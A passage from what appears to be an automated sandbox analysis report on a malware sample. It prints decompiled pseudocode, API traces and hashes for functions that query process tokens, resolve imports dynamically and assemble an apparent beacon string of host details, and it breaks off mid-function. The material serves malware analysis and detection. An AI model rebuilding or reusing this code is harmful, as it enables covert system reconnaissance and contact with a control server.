                                                          • String ID:
                                                          • API String ID: 2411391700-0
                                                          • Opcode ID: d7d48c752d277fc75eef2971f2876876fa2d302bbd01ea976d12485b02559417
                                                          • Instruction ID: dd84e7238fd3962cc551bc6187e2c746cd3a103bd56705d7a22c4cfcb501a14c
                                                          • Opcode Fuzzy Hash: d7d48c752d277fc75eef2971f2876876fa2d302bbd01ea976d12485b02559417
                                                          • Instruction Fuzzy Hash: 30F0FF76900119BBDF11EFE9CC48CDF7BACEF492647154462EA04D7301E635EA159BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F361A, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(052E9A78,00000000,00000000,7742C740,047F20ED,00000000), ref: 047F362A
                                                          • lstrlen.KERNEL32(?), ref: 047F3632
                                                            • Part of subcall function 047FA71F: RtlAllocateHeap.NTDLL(00000000,00000000,047F5595), ref: 047FA72B
                                                          • lstrcpy.KERNEL32(00000000,052E9A78), ref: 047F3646
                                                          • lstrcat.KERNEL32(00000000,?), ref: 047F3651
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                          • String ID:
                                                          • API String ID: 74227042-0
                                                          • Opcode ID: a16217d9abfdd86b75dbf1622795a97663d7c5c78297c55d089b68c2b26dba4c
                                                          • Instruction ID: c0390c2a8340e34de292333f178248094e55e5560c548f4655cd5c545ecc4c23
                                                          • Opcode Fuzzy Hash: a16217d9abfdd86b75dbf1622795a97663d7c5c78297c55d089b68c2b26dba4c
                                                          • Instruction Fuzzy Hash: AEE012735016256B8712ABE8AC48CAFBBADFF896617044817FB01D3210C7299C069BE5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Analysis Process: rundll32.exe PID: 6096 Parent PID: 3492 rundll32.exeCOMMON

                                                          Executed Functions

                                                          Function 04475A27, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 38%
                                                          			E04475A27(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E0447A71F(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E0447A734(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                          0x04475a34
                                                          0x04475a35
                                                          0x04475a36
                                                          0x04475a37
                                                          0x04475a38
                                                          0x04475a3c
                                                          0x04475a43
                                                          0x04475a52
                                                          0x04475a55
                                                          0x04475a58
                                                          0x04475a5f
                                                          0x04475a62
                                                          0x04475a65
                                                          0x04475a68
                                                          0x04475a6b
                                                          0x04475a76
                                                          0x04475a78
                                                          0x04475a81
                                                          0x04475a89
                                                          0x04475a8b
                                                          0x04475a9d
                                                          0x04475aa7
                                                          0x04475aab
                                                          0x04475aba
                                                          0x04475abe
                                                          0x04475ac7
                                                          0x04475acf
                                                          0x04475acf
                                                          0x04475ad1
                                                          0x04475ad1
                                                          0x04475ad9
                                                          0x04475adf
                                                          0x04475ae3
                                                          0x04475ae3
                                                          0x04475aee

                                                          APIs
                                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04475A6E
                                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04475A81
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04475A9D
                                                            • Part of subcall function 0447A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04475595), ref: 0447A72B
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04475ABA
                                                          • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04475AC7
                                                          • NtClose.NTDLL(?), ref: 04475AD9
                                                          • NtClose.NTDLL(00000000), ref: 04475AE3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2575439697-0
                                                          • Opcode ID: f57b61c69cea5a09fd4f64374dcbef774896cd1fd6eb3a9b2fe2d6b21c52ecee
                                                          • Instruction ID: 03d1814f19125f8e3021e876aad524f91477f6bccd3ada995031b032be8174ed
                                                          • Opcode Fuzzy Hash: f57b61c69cea5a09fd4f64374dcbef774896cd1fd6eb3a9b2fe2d6b21c52ecee
                                                          • Instruction Fuzzy Hash: 6821E772900218FBEF01AFA5CC85ADEBFBDEB48750F104026F605E6150D7759A459BE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04474AB6, Relevance: 33.2, APIs: 22, Instructions: 244memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E04474AB6(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				signed int _t111;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x447d018; // 0xf1c1aee9
				asm("bswap eax");
				_t61 =  *0x447d014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x447d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 = E0447D00C; // 0xeec43f25
				asm("bswap eax");
				_t64 =  *0x447d2a8; // 0xb9a5a8
				_t3 = _t64 + 0x447e633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3d15e, _t63, _t62, _t61, _t60,  *0x447d02c,  *0x447d004, _t59);
				_t67 = E044756CD();
				_t68 =  *0x447d2a8; // 0xb9a5a8
				_t4 = _t68 + 0x447e673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71; // executed
				_t72 = E044758DB(_t134); // executed
				_t133 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x447d2a8; // 0xb9a5a8
					_t7 = _t126 + 0x447e8d4; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x447d238, 0, _v8);
				}
				_t73 = E0447A199();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x447d2a8; // 0xb9a5a8
					_t11 = _t121 + 0x447e8dc; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x447d238, 0, _v8);
				}
				_t146 =  *0x447d32c; // 0x50195b0
				_t75 = E04474622(0x447d00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					RtlFreeHeap( *0x447d238, _t152, _a16); // executed
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x447d238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x447d238, _t152, _v20);
						goto L26;
					}
					E0447518F(GetTickCount());
					_t82 =  *0x447d32c; // 0x50195b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x447d32c; // 0x50195b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x447d32c; // 0x50195b0
					_t148 = E04471BB6(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0x447d238, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0x447c28c);
					_push(_t148);
					_t94 = E0447361A();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x447d238, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E04479070( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E04476761();
						L22:
						HeapFree( *0x447d238, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E044769B4(_t133, 0xffffffffffffffff, _t148,  &_v24); // executed
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_t111 = E0447391F(_t157, _a4, _a8, _a12); // executed
						_v12 = _t111;
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E0447A734(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E04475800(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E0447A734(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}






















































                                                          0x04474ab6
                                                          0x04474ab6
                                                          0x04474ab6
                                                          0x04474abf
                                                          0x04474ac8
                                                          0x04474aca
                                                          0x04474aca
                                                          0x04474ad7
                                                          0x04474ae2
                                                          0x04474ae5
                                                          0x04474aea
                                                          0x04474af3
                                                          0x04474af6
                                                          0x04474afb
                                                          0x04474afe
                                                          0x04474b03
                                                          0x04474b06
                                                          0x04474b12
                                                          0x04474b1f
                                                          0x04474b21
                                                          0x04474b27
                                                          0x04474b2c
                                                          0x04474b37
                                                          0x04474b39
                                                          0x04474b3c
                                                          0x04474b3e
                                                          0x04474b43
                                                          0x04474b49
                                                          0x04474b4e
                                                          0x04474b51
                                                          0x04474b56
                                                          0x04474b63
                                                          0x04474b65
                                                          0x04474b6b
                                                          0x04474b75
                                                          0x04474b75
                                                          0x04474b77
                                                          0x04474b7c
                                                          0x04474b81
                                                          0x04474b84
                                                          0x04474b89
                                                          0x04474b96
                                                          0x04474b98
                                                          0x04474ba6
                                                          0x04474ba6
                                                          0x04474ba8
                                                          0x04474bb6
                                                          0x04474bbb
                                                          0x04474bbd
                                                          0x04474bc2
                                                          0x04474d83
                                                          0x04474d8d
                                                          0x04474d96
                                                          0x04474bc8
                                                          0x04474bd4
                                                          0x04474bda
                                                          0x04474bdf
                                                          0x04474d77
                                                          0x04474d81
                                                          0x00000000
                                                          0x04474d81
                                                          0x04474beb
                                                          0x04474bf0
                                                          0x04474bf9
                                                          0x04474c0a
                                                          0x04474c0e
                                                          0x04474c17
                                                          0x04474c1d
                                                          0x04474c2c
                                                          0x04474c33
                                                          0x04474c3c
                                                          0x04474c42
                                                          0x04474d6b
                                                          0x04474d75
                                                          0x00000000
                                                          0x04474d75
                                                          0x04474c4e
                                                          0x04474c54
                                                          0x04474c55
                                                          0x04474c5a
                                                          0x04474c5f
                                                          0x04474d61
                                                          0x04474d69
                                                          0x00000000
                                                          0x04474d69
                                                          0x04474c68
                                                          0x04474c6f
                                                          0x04474c77
                                                          0x04474c7c
                                                          0x04474c85
                                                          0x04474c90
                                                          0x04474c95
                                                          0x04474c9a
                                                          0x04474d99
                                                          0x04474d4d
                                                          0x04474d4d
                                                          0x04474d52
                                                          0x04474d5d
                                                          0x04474d5f
                                                          0x00000000
                                                          0x04474d5f
                                                          0x04474ca4
                                                          0x04474ca9
                                                          0x04474cae
                                                          0x04474cb3
                                                          0x04474cbe
                                                          0x04474cc3
                                                          0x04474cc6
                                                          0x04474ccc
                                                          0x04474cd2
                                                          0x04474cd8
                                                          0x04474cdb
                                                          0x04474ce1
                                                          0x04474ce4
                                                          0x04474ce9
                                                          0x04474ced
                                                          0x04474ced
                                                          0x04474cf9
                                                          0x04474d05
                                                          0x04474d09
                                                          0x04474d0b
                                                          0x04474d10
                                                          0x04474d12
                                                          0x04474d17
                                                          0x04474d1c
                                                          0x04474d29
                                                          0x04474d31
                                                          0x04474d34
                                                          0x04474d34
                                                          0x04474d10
                                                          0x00000000
                                                          0x04474cfb
                                                          0x04474cff
                                                          0x04474d36
                                                          0x04474d39
                                                          0x04474d42
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04474d42
                                                          0x04474d01
                                                          0x00000000
                                                          0x04474d01
                                                          0x04474cf9

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04474ACA
                                                          • wsprintfA.USER32 ref: 04474B1A
                                                          • wsprintfA.USER32 ref: 04474B37
                                                          • wsprintfA.USER32 ref: 04474B63
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04474B75
                                                          • wsprintfA.USER32 ref: 04474B96
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04474BA6
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04474BD4
                                                          • GetTickCount.KERNEL32 ref: 04474BE5
                                                          • RtlEnterCriticalSection.NTDLL(05019570), ref: 04474BF9
                                                          • RtlLeaveCriticalSection.NTDLL(05019570), ref: 04474C17
                                                            • Part of subcall function 04471BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,044720C2,?,050195B0), ref: 04471BE1
                                                            • Part of subcall function 04471BB6: lstrlen.KERNEL32(?,?,?,044720C2,?,050195B0), ref: 04471BE9
                                                            • Part of subcall function 04471BB6: strcpy.NTDLL ref: 04471C00
                                                            • Part of subcall function 04471BB6: lstrcat.KERNEL32(00000000,?), ref: 04471C0B
                                                            • Part of subcall function 04471BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,044720C2,?,050195B0), ref: 04471C28
                                                          • StrTrimA.SHLWAPI(00000000,0447C28C,?,050195B0), ref: 04474C4E
                                                            • Part of subcall function 0447361A: lstrlen.KERNEL32(05019A78,00000000,00000000,7742C740,044720ED,00000000), ref: 0447362A
                                                            • Part of subcall function 0447361A: lstrlen.KERNEL32(?), ref: 04473632
                                                            • Part of subcall function 0447361A: lstrcpy.KERNEL32(00000000,05019A78), ref: 04473646
                                                            • Part of subcall function 0447361A: lstrcat.KERNEL32(00000000,?), ref: 04473651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 04474C6F
                                                          • lstrcpy.KERNEL32(?,?), ref: 04474C77
                                                          • lstrcat.KERNEL32(?,?), ref: 04474C85
                                                          • lstrcat.KERNEL32(?,00000000), ref: 04474C8B
                                                            • Part of subcall function 04479070: lstrlen.KERNEL32(?,00000000,05019A98,00000000,04478808,05019C76,?,?,?,?,?,63699BC3,00000005,0447D00C), ref: 04479077
                                                            • Part of subcall function 04479070: mbstowcs.NTDLL ref: 044790A0
                                                            • Part of subcall function 04479070: memset.NTDLL ref: 044790B2
                                                          • wcstombs.NTDLL ref: 04474D1C
                                                            • Part of subcall function 0447391F: SysAllocString.OLEAUT32(?), ref: 0447395A
                                                            • Part of subcall function 0447391F: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 044739DD
                                                            • Part of subcall function 0447A734: HeapFree.KERNEL32(00000000,00000000,04475637,00000000,?,?,00000000), ref: 0447A740
                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 04474D5D
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04474D69
                                                          • HeapFree.KERNEL32(00000000,?,?,050195B0), ref: 04474D75
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04474D81
                                                          • RtlFreeHeap.NTDLL(00000000,?), ref: 04474D8D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                          • String ID:
                                                          • API String ID: 603507560-0
                                                          • Opcode ID: dc19c67fc88852eecd4d5474a07a40b24a82619c536d16f8bc2c965b783b40c7
                                                          • Instruction ID: 2bb9a26e6c3d34c490bee4d2516ba57a23c90f3c228342be6fff1a279c4e1b4e
                                                          • Opcode Fuzzy Hash: dc19c67fc88852eecd4d5474a07a40b24a82619c536d16f8bc2c965b783b40c7
                                                          • Instruction Fuzzy Hash: 739138B1900108AFEF11DFA5DC88AAEBBB9EF48354B144465E508E7220DB39ED53DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0447AC55, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 51%
                                                          			E0447AC55(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x4470000;
				_t115 = _t139[3] + 0x4470000;
				_t131 = _t139[4] + 0x4470000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x4470000;
				_v16 = _t139[5] + 0x4470000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x4470002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x447d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x447d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x447d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x447d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x447d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x447d198; // 0x0
										 *_t102 = _t125;
										 *0x447d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x447d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































                                                          0x0447ac64
                                                          0x0447ac7a
                                                          0x0447ac80
                                                          0x0447ac82
                                                          0x0447ac87
                                                          0x0447ac8d
                                                          0x0447ac92
                                                          0x0447ac95
                                                          0x0447aca3
                                                          0x0447acaa
                                                          0x0447acad
                                                          0x0447acb0
                                                          0x0447acb1
                                                          0x0447acb4
                                                          0x0447acb7
                                                          0x0447acba
                                                          0x0447acbf
                                                          0x0447acce
                                                          0x00000000
                                                          0x0447acd4
                                                          0x0447acde
                                                          0x0447ace8
                                                          0x0447aced
                                                          0x0447acef
                                                          0x0447acf9
                                                          0x0447acfc
                                                          0x0447acff
                                                          0x0447ad05
                                                          0x0447ad07
                                                          0x0447ad07
                                                          0x0447ad0a
                                                          0x0447ad0d
                                                          0x0447ad12
                                                          0x0447ad16
                                                          0x0447ad29
                                                          0x0447ad2b
                                                          0x0447add3
                                                          0x0447add3
                                                          0x0447adda
                                                          0x0447addd
                                                          0x0447ade7
                                                          0x0447ade7
                                                          0x0447adeb
                                                          0x0447ae69
                                                          0x0447ae6c
                                                          0x0447ae6e
                                                          0x0447ae6e
                                                          0x0447ae75
                                                          0x0447ae77
                                                          0x0447ae81
                                                          0x0447ae84
                                                          0x0447ae87
                                                          0x0447ae87
                                                          0x00000000
                                                          0x0447aded
                                                          0x0447adf0
                                                          0x0447ae1e
                                                          0x0447ae28
                                                          0x0447ae2c
                                                          0x0447ae34
                                                          0x0447ae37
                                                          0x0447ae3e
                                                          0x0447ae48
                                                          0x0447ae48
                                                          0x0447ae4c
                                                          0x0447ae51
                                                          0x0447ae60
                                                          0x0447ae66
                                                          0x0447ae66
                                                          0x0447ae4c
                                                          0x00000000
                                                          0x0447adf7
                                                          0x0447adfa
                                                          0x0447ae02
                                                          0x0447ae17
                                                          0x0447ae1c
                                                          0x00000000
                                                          0x00000000
                                                          0x0447ae1c
                                                          0x00000000
                                                          0x0447ae02
                                                          0x0447adf0
                                                          0x0447adeb
                                                          0x0447ad31
                                                          0x0447ad38
                                                          0x0447ad48
                                                          0x0447ad4b
                                                          0x0447ad51
                                                          0x0447ad55
                                                          0x0447ad98
                                                          0x0447ada4
                                                          0x0447adcd
                                                          0x0447ada6
                                                          0x0447adaa
                                                          0x0447adb0
                                                          0x0447adb8
                                                          0x0447adba
                                                          0x0447adbd
                                                          0x0447adc3
                                                          0x0447adc5
                                                          0x0447adc5
                                                          0x0447adb8
                                                          0x0447adaa
                                                          0x00000000
                                                          0x0447ada4
                                                          0x0447ad5d
                                                          0x0447ad60
                                                          0x0447ad67
                                                          0x0447ad77
                                                          0x0447ad7a
                                                          0x0447ad8a
                                                          0x00000000
                                                          0x0447ad90
                                                          0x0447ad71
                                                          0x0447ad75
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0447ad75
                                                          0x0447ad42
                                                          0x0447ad46
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0447ad46
                                                          0x0447ad1f
                                                          0x0447ad23
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0447ACCE
                                                          • LoadLibraryA.KERNELBASE(?), ref: 0447AD4B
                                                          • GetLastError.KERNEL32 ref: 0447AD57
                                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0447AD8A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                          • String ID: $
                                                          • API String ID: 948315288-3993045852
                                                          • Opcode ID: 2bdb09a4faa2eb2b8b123c9246b94331e169256fec60c7ca5be37d07ccf780ba
                                                          • Instruction ID: 54593ce2f8d25f4048db7cc7ab37054ac96e769ea291bfd09d62562a46ddef7f
                                                          • Opcode Fuzzy Hash: 2bdb09a4faa2eb2b8b123c9246b94331e169256fec60c7ca5be37d07ccf780ba
                                                          • Instruction Fuzzy Hash: A4810975A40205AFEF20CFA8D884AEEB7F5EF48315F14842AE505E7340E7B4E946CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 044751B0, Relevance: 16.6, APIs: 11, Instructions: 150timememoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 83%
                                                          			E044751B0(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x447d240);
					_v20 = 0;
					_v16 = 0;
					L0447AF2E();
					_v36.LowPart = _t46;
